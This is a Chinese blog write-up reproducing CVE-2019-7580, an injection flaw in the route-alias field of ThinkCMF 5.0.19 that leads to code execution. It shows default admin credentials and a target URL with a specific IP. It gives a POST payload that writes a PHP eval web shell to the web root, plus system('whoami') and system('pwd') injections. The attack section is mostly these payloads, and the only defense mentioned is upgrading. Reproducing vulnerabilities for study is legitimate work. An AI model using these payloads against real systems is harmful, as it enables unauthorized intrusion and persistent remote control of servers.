thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现

最新推荐文章于 2024-02-21 11:04:39 发布
最新推荐文章于 2024-02-21 11:04:39 发布
阅读量2.4k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/124682604
版权

所有文章,仅供安全研究与学习之用,后果自负!

thinkcmf 代码执行 CVE-2019-7580

thinkcmf 代码执行 (CVE-2019-7580)

复现小心会搞崩环境。

0x01 漏洞描述

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf 5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

0x02 影响范围

5.0.190111

0x03 漏洞复现

3.1 登录后台

admin 123456
/user/login/index.html
在这里插入图片描述

3.2 漏洞利用

3.2.1webshell

url:

http://118.193.36.37:34311/portal/admin_category/addpost.html

post 请求包:

parent_id=0&name=111&alias=1'=>array(""),file_put_contents('/var/www/html/public/shell.php','<?php eval($_POST[cmd]);?>'),'2

在这里插入图片描述
在根目录shell生成 文件 连接
在这里插入图片描述

3.2 phpinfo

/admin/index/index.html#/portal/admin_category/index.html
门户管理-》分类管理-》添加分类-》
在这里插入图片描述
在这里插入图片描述

3.3 获取系统命令

1’=>array(“”),system(‘whoami’),‘2
1’=>array(“”),system(‘pwd’),'2

0x04 漏洞修复

升级版本

LuckyCharm~
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【组件攻击链】ThinkCMF 高危漏洞分析与利用
systemino的博客
11-27 998
一、组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 普通的CMS(内容管理系统)一般不能完成所有的需求,而因为CMS在ThinkCMF内部
组件攻击链ThinkCMF高危漏洞分析与利用1
08-03
1.1 基本信息 1.2 版本介绍 1.3 使量及使分布 3.1 ThinkCMFX 2.x GetShell 3.2 ThinkCMF 5.x GetShel
[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现CVE-2019-7580phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH
qq_37092496的博客
03-16 6995
前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。1 文章也会在这里同步 0x01进入后台 进入后台路径为:http://ip:port/admin 0x02我们这里使用弱口令登录 账户密码:admin:123456 0x03进入添加分类页面 依次进入 1、门户管理 2、分类管理 3、添加分类 分类名称随便填 分类别名输入poc: 1'=&g
ThinkCMF代码执行 (CVE-2019-7580)
最新发布
m0_65150886的博客
02-21 474
ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. ThinkCMF 5.0.19这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发代码执行漏洞。2.访问http://ip:port/admin,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.分类名称和描述随便填,分类别名输入poc,并点击添加。4.门户管理->分类管理->添加分类。6.勾选添加的分类,并点击显示。3.输入账号密码进行登录。
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1649
【thinkcmf-文件包含】public函数
thinkcmf-5.0.190111后台任意文件写入导致的代码执行CVE-2019-7580
公众号shadow sock7
02-11 4446
https://xz.aliyun.com/t/3997
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2172
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2860
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 724
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
thinkcmf漏洞导致网站被挂webshell木马
cbaln0的博客
11-05 1810
大概是10月22日开始漏洞入侵,入侵版本为thinkCMFX的所有版本,就是thinkphp3.2版本的thinkcmf 修复方法 将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰由原来的 public 改为 protected 需要检查是否已经被入侵,可...
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全造成严重威胁和损害。我们应该尊重他人的合法权益,遵守法律法规,远离黑客攻击等违法行为,共同维护网络安全。如果您需要更多关于该漏洞的信息,可以查阅相关的安全公告或 CVE 详细信息。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值